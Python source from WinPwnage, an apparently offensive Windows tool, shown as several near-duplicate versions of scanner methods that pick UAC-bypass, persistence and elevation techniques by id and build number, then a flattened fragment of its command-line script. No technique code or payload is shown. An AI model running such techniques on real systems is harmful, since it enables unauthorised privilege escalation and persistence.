def run(self, id, payload, **kwargs):
    """Dispatch the table entry whose id matches ``id``, if enabled and in range.

    Walks the module-level ``functions`` table and skips every category whose
    flag on this instance (``uac``, ``persist``, ``elevate``, ``execute``) is
    falsy. For an entry whose ``"Id"`` contains ``id``, the current build
    number is compared against the half-open range ``[Works From, Fixed In)``:
    inside the range the callable named by ``"Function Name"`` is looked up in
    this module's globals and called; outside it an error line is printed.

    Args:
        id: Entry id as a string; compared by substring (see the note in the
            loop). The name shadows the ``id`` builtin inside this method.
        payload: Passed unchanged as the first positional argument of the
            selected callable.
        **kwargs: Optional ``name`` (default ``'WinPwnage'``) and ``add``
            (default ``True``); forwarded only to callables that use those
            names.

    Returns:
        ``Constant.output`` once a matching entry has been handled, or
        ``None`` implicitly when no enabled entry matches.
    """
    print_info("Attempting to run id ({}) configured with payload ({})".format(id, payload))
    for i in functions:
        # Commented-out variant of the filter below that lacks the 'execute' check.
        #if i == 'uac' and not self.uac or i == 'persist' and not self.persist or i == 'elevate' and not self.elevate:
        # Skip every category whose flag on this instance is falsy.
        if i == 'uac' and not self.uac or i == 'persist' and not self.persist or i == 'elevate' and not self.elevate or i == 'execute' and not self.execute:
            continue
        for info in functions[i]:
            # NOTE(review): substring test, not equality -- an id of '1' also
            # matches an entry whose id is '11' or '21'. A non-str id raises
            # TypeError here.
            if id in str(info["Id"]):
                # Version gate: Works From <= current build < Fixed In.
                if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]):
                    # Resolved by name from module globals, so any module-level
                    # callable is reachable; this is only safe while the
                    # `functions` table is static, trusted data -- TODO confirm
                    # where the table is built.
                    f = globals()[info["Function Name"]]
                    # NOTE(review): co_varnames lists local variables as well as
                    # parameters, so these checks also match a function that
                    # merely has a local called 'name' or 'add'.
                    # 'add' is used but 'name' is not: forward only 'add'.
                    if 'name' not in f.__code__.co_varnames and 'add' in f.__code__.co_varnames:
                        f(payload, add=kwargs.get('add', True))
                    # Both 'name' and 'add' are used: supply a default name when
                    # the caller gave none (the author notes this supports an
                    # integration that needs custom names).
                    elif 'name' in f.__code__.co_varnames and 'add' in f.__code__.co_varnames:
                        f(payload, name=kwargs.get('name', 'WinPwnage'), add=kwargs.get('add', True))
                    # Otherwise the callable is invoked with the payload alone.
                    else:
                        f(payload)
                else:
                    print_error('Technique not compatible with this system.')
                # NOTE(review): nesting was reconstructed from a flattened
                # listing -- confirm the return sits at the id-match level, so
                # that only the first matching entry is handled.
                return Constant.output
            else:
                pass
def run(self, id, payload, **kwargs):
    """Dispatch the table entry whose id matches ``id``, if enabled and in range.

    Iterates the module-level ``functions`` table, skipping categories whose
    flag on this instance (``uac``, ``persist``, ``elevate``) is falsy. For an
    entry whose ``"Id"`` contains ``id``, the callable named by
    ``"Function Name"`` is looked up in this module's globals and called when
    ``Works From <= build number < Fixed In``; otherwise an error line is
    printed.

    Args:
        id: Entry id as a string; matched by substring, not equality.
        payload: First positional argument handed to the selected callable.
        **kwargs: Optional ``name`` (default ``"WinPwnage"``) and ``add``
            (default ``True``), forwarded only to callables that use them.

    Returns:
        ``Constant.output`` after a matching entry was handled, otherwise
        ``None`` implicitly.
    """
    print_info(
        "Attempting to run method ({id}) configured with payload ({payload})"
        .format(id=id, payload=payload))
    for i in functions:
        # Skip every category whose flag on this instance is falsy.
        if i == "uac" and not self.uac or i == "persist" and not self.persist or i == "elevate" and not self.elevate:
            continue
        for info in functions[i]:
            # NOTE(review): substring match -- "1" also selects an entry whose
            # id is "11"; a non-str id raises TypeError.
            if id in str(info["Id"]):
                # Half-open build range: lower bound inclusive, upper exclusive.
                if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]):
                    # Name-based lookup in module globals; safe only while the
                    # table is static, trusted data -- TODO confirm its origin.
                    f = globals()[info["Function Name"]]
                    # NOTE(review): co_varnames also contains local variable
                    # names, so this is not a strict signature check.
                    if "name" not in f.__code__.co_varnames and "add" in f.__code__.co_varnames:
                        f(payload, add=kwargs.get("add", True))
                    elif "name" in f.__code__.co_varnames and "add" in f.__code__.co_varnames:
                        f(payload,
                          name=kwargs.get("name", "WinPwnage"),
                          add=kwargs.get("add", True))
                    else:
                        # Neither keyword is forwarded; payload only.
                        f(payload)
                else:
                    print_error(
                        "Technique not compatible with this system.")
                # NOTE(review): nesting reconstructed from a flattened listing --
                # confirm the return belongs at the id-match level.
                return Constant.output
            else:
                pass
def start(self):
    """Print a per-entry compatibility table for the enabled categories.

    Every entry of the module-level ``functions`` table whose category flag
    on this instance (``uac``, ``persist``, ``elevate``, ``execute``) is
    truthy is reported through ``table_success`` when
    ``Works From <= build number < Fixed In`` and through ``table_error``
    otherwise. The verdict rests on the build number alone, which is why the
    banner warns about false positives.

    Returns:
        ``Constant.output``.
    """
    notice = "Comparing build number ({}) against 'Fixed In' build numbers, false positives might happen."
    print_info(notice.format(information().build_number()))
    print_table()
    row_layout = "\t{Type}\t{Function Payload}\t\t{Admin}\t\t{Description}"
    for category in functions:
        switched_off = (
            (category == 'uac' and not self.uac)
            or (category == 'persist' and not self.persist)
            or (category == 'elevate' and not self.elevate)
            or (category == 'execute' and not self.execute)
        )
        if switched_off:
            continue
        for entry in functions[category]:
            # Half-open range; the build number is queried again per entry.
            in_range = (
                int(entry["Works From"])
                <= int(information().build_number())
                < int(entry["Fixed In"])
            )
            report = table_success if in_range else table_error
            report(entry["Id"], row_layout.format(**entry))
    return Constant.output
def start(self):
    """Print a per-entry compatibility table for the enabled categories.

    Entries of the module-level ``functions`` table are reported through
    ``table_success`` when ``Works From <= build number < Fixed In`` and
    through ``table_error`` otherwise. Categories whose flag on this instance
    (``uac``, ``persist``, ``elevate``) is falsy are left out. Only the build
    number is compared, so the result is a version-range estimate.

    Returns:
        ``Constant.output``.
    """
    notice = "Comparing build number ({buildnumber}) against 'Fixed In' build numbers"
    print_info(notice.format(buildnumber=information().build_number()))
    print_table()
    for category in functions:
        switched_off = (
            (category == "uac" and not self.uac)
            or (category == "persist" and not self.persist)
            or (category == "elevate" and not self.elevate)
        )
        if switched_off:
            continue
        for entry in functions[category]:
            # Lower bound inclusive, upper bound exclusive; queried per entry.
            in_range = (
                int(entry["Works From"])
                <= int(information().build_number())
                < int(entry["Fixed In"])
            )
            report = table_success if in_range else table_error
            report(
                id=entry["Id"],
                type=entry["Type"],
                description=entry["Description"],
            )
    return Constant.output
def start(self):
    """Print a per-entry compatibility table for the enabled categories.

    Entries of the module-level ``functions`` table are reported through
    ``table_success`` when ``Works From <= build number < Fixed In`` and
    through ``table_error`` otherwise. The ``uac`` and ``persist`` categories
    are skipped when the matching flag on this instance is falsy. The check
    uses the build number only, hence the false-positive warning in the
    banner.

    Returns:
        ``Constant.output``.
    """
    notice = "Comparing build number ({}) against 'Fixed In' build numbers, false positives might happen."
    print_info(notice.format(information().build_number()))
    print_table()
    row_layout = "\t{}\t{}\t\t{}\t\t{}"
    columns = ("Type", "Function Payload", "Admin", "Description")
    for category in functions:
        switched_off = (
            (category == 'uac' and not self.uac)
            or (category == 'persist' and not self.persist)
        )
        if switched_off:
            continue
        for entry in functions[category]:
            # Half-open range; the build number is queried again per entry.
            in_range = (
                int(entry["Works From"])
                <= int(information().build_number())
                < int(entry["Fixed In"])
            )
            report = table_success if in_range else table_error
            report(
                entry["Id"],
                row_layout.format(*[str(entry[column]) for column in columns]),
            )
    return Constant.output
def run(self, id, payload, **kwargs):
    """Dispatch the table entry whose id matches ``id``, if enabled and in range.

    Iterates the module-level ``functions`` table, skipping the ``uac`` and
    ``persist`` categories when the matching flag on this instance is falsy.
    For an entry whose ``"Id"`` contains ``id``, the callable named by
    ``"Function Name"`` is looked up in this module's globals and called when
    ``Works From <= build number < Fixed In``; otherwise an error line is
    printed.

    Args:
        id: Entry id as a string; matched by substring, not equality.
        payload: First positional argument handed to the selected callable.
        **kwargs: Optional ``name`` (default ``''``) and ``add`` (default
            ``True``), forwarded only when the callable uses both names.

    Returns:
        ``Constant.output`` after a matching entry was handled, otherwise
        ``None`` implicitly.
    """
    print_info("Attempting to run id ({}) configured with payload ({})".format(id, payload))
    for i in functions:
        # Skip a category whose flag on this instance is falsy.
        if i == 'uac' and not self.uac or i == 'persist' and not self.persist:
            continue
        for info in functions[i]:
            # NOTE(review): substring match -- '1' also selects an entry whose
            # id is '11'; a non-str id raises TypeError.
            if id in str(info["Id"]):
                # Half-open build range: lower bound inclusive, upper exclusive.
                if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]):
                    # Name-based lookup in module globals; safe only while the
                    # table is static, trusted data -- TODO confirm its origin.
                    f = globals()[info["Function Name"]]
                    # NOTE(review): co_varnames also contains local variable
                    # names, so this is not a strict signature check.
                    if 'name' in f.__code__.co_varnames and 'add' in f.__code__.co_varnames:
                        f(payload, name=kwargs.get('name', ''), add=kwargs.get('add', True))
                    else:
                        # Any other callable receives the payload alone.
                        f(payload)
                else:
                    print_error('Technique not compatible with this system.')
                # NOTE(review): nesting reconstructed from a flattened listing --
                # confirm the return belongs at the id-match level.
                return Constant.output
            else:
                pass
def run(self, id, payload):
    """Dispatch the table entry whose id matches ``id``, if enabled and in range.

    Iterates the module-level ``functions`` table, skipping the ``uac`` and
    ``persist`` categories when the matching flag on this instance is falsy.
    For an entry whose ``"Id"`` contains ``id``, the callable named by
    ``"Function Name"`` is looked up in this module's globals and called with
    the payload when ``Works From <= build number < Fixed In``; otherwise an
    error line is printed.

    Args:
        id: Entry id as a string; matched by substring, not equality.
        payload: Handed to the selected callable after ``os.path.join``.

    Returns:
        ``Constant.output`` after a matching entry was handled, ``False``
        when no enabled entry matched.
    """
    print_info(
        "Attempting to run id ({}) configured with payload ({})".format(
            id, payload))
    for i in functions:
        # Skip a category whose flag on this instance is falsy.
        if i == 'uac' and not self.uac or i == 'persist' and not self.persist:
            continue
        for info in functions[i]:
            # NOTE(review): substring match -- '1' also selects an entry whose
            # id is '11'; a non-str id raises TypeError.
            if id in str(info["Id"]):
                # Half-open build range: lower bound inclusive, upper exclusive.
                if int(info["Works From"]) <= int(information().build_number()) < int(info["Fixed In"]):
                    # Name-based lookup in module globals; safe only while the
                    # table is static, trusted data -- TODO confirm its origin.
                    # NOTE(review): os.path.join with a single str argument
                    # returns it unchanged, so the payload path is neither
                    # normalized nor validated here.
                    globals()[info["Function Name"]](os.path.join(payload))
                else:
                    print_error(
                        'Technique not compatible with this system.')
                # NOTE(review): nesting reconstructed from a flattened listing --
                # confirm the return belongs at the id-match level.
                return Constant.output
            else:
                pass
    # NOTE(review): assumed to sit at function level (reached only when
    # nothing matched) -- confirm against the original layout.
    return False
from __future__ import print_function import sys from winpwnage.core.prints import print_info from winpwnage.core.scanner import scanner, function from winpwnage.core.utils import information print(""" _ _ _ _|_|___ ___ _ _ _ ___ ___ ___ ___ | | | | | | . | | | | | .'| . | -_| |_____|_|_|_| _|_____|_|_|__,|_ |___| |_| |___| """) print_info("UAC level: {}".format(information().uac_level())) print_info("Build number: {}".format(information().build_number())) print_info("Running elevated: {}\n".format(information().admin())) def main(): # # Scanner # if sys.argv[1].lower() == "-scan": if sys.argv[2].lower() == "-uac": scanner(uac=True, persist=False, elevate=False, execute=False).start() elif sys.argv[2].lower() == "-persist": scanner(uac=False, persist=True, elevate=False, execute=False).start() elif sys.argv[2].lower() == "-elevate":